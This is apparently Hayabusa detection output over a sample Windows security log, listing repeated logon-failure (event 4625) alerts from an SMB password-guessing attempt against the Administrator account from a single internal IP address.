+2016-09-19 16:51:45.197 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.274 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.318 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.498 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.578 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.679 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.830 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.158 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.204 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.700 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.737 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.883 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.010 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.112 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.154 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.195 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.433 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.488 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.530 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.575 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.618 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.694 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.736 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.777 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.909 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.957 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.049 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.091 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.201 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.249 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.332 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.376 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.570 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.617 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.661 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.791 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.867 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: 